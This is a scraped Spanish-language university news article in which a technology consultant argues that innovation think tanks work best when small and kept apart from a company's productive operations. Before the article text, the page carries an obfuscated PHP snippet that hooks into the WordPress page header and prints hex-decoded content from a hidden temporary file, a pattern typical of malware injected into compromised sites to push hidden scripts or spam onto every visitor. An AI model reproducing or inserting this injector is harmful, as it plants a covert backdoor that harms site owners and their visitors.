if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Se puede tener innovación o productividad masiva, pero no ambas cosas – La Opinión Universitaria La Opinión Universitaria
Menu

Se puede tener innovación o productividad masiva, pero no ambas cosas

 

+ – El Think Tank crece demasiado pronto o demasiado grande, es perjudicial para el rendimiento

 

Por Diego Cuautle

Muchas de las empresas intentan la innovación y productividad al mismo tiempo, sin embargo algunas cosas no se puede, dos entidades problemáticas tan importantes en adaptación, evolución y éxito, señaló Alfred Max Hofbauer Balmori, Consultor Tecnológico e Innovador del CESAT

¿Por qué intentar meterlas en una misma caja, si es mucho más fácil mantenerlas separadas?, a lo que el académico, “es un error conceptual y operativo suponer que tiene que convivir. Como ya hemos visto en artículos anteriores de esta serie, mantenerlas bien distanciadas, una de la otra, es bueno para la creatividad y la productividad, así como para la calma del «estrato gerencial» de la empresa”.

En este sentido, destacó que también quedó muy claro que, para obtener resultados óptimos, el grupo de innovación (o Think Tank) tiene que mantenerse vivo y enérgico, afilándose los dientes continuamente con un abanico muy amplio de problemas.

“En muchos casos, se requiere de problemas más variados que los que la compañía típica puede proveer. Por lo tanto, un grupo de compañías variopintas puede compartir un Think Tank para resolver problemas tecnológicos, generar innovaciones y producir progreso en general. Si el alcance es lo suficientemente amplio y los desafíos lo suficientemente grandes, el Think Tank literalmente despegará y comenzará a producir resultados sorprendentes”, comentó.

Sin embargo, dijo, si un Think Tank crece demasiado pronto o demasiado grande, generalmente es perjudicial para su rendimiento. Por lo tanto, «petite et agile» es la receta más prometedora. Inicialmente, muchos Start-Ups nacen como Think Tanks, pero pierden su ventaja innovadora a medida que se convierten en una empresa grande, lenta y difícil de manejar.

“Este no es necesariamente un resultado indeseable, ya que muchos Start-Ups quieren convertirse en empresas grandes y exitosas. El problema surge al interpretar un Think Tank como una fábrica de Start-Ups o como un Start-Up exclusivamente”, reiteró.

Destacó que el éxito -a largo plazo- de un Think Tank estriba en la generación de innovación y creatividad, lo que puede resultar en una gran variedad de resultados: mejores productos, patentes, procesos, medios de producción, transferencia tecnológica, Start-Ups, Spin-Offs, alianzas estratégicas, etc. Limitar el enfoque a un solo resultado, seguramente sofocará muchas oportunidades futuras”, comentó.

“Muchos Think Tanks fantásticamente eficientes no son nada voluminosos. Normalmente comprenden solo un grupo pequeño de personas, por ejemplo, un “Innovador Central”, cuatro “Innovadores Satélite” y quizás uno o dos personajes periféricos, en un organigrama completamente plano. Eso puede sonar contraintuitivo, pero hay que recordar”, concluyó.

No comments

Deja una respuesta

Tweets recientes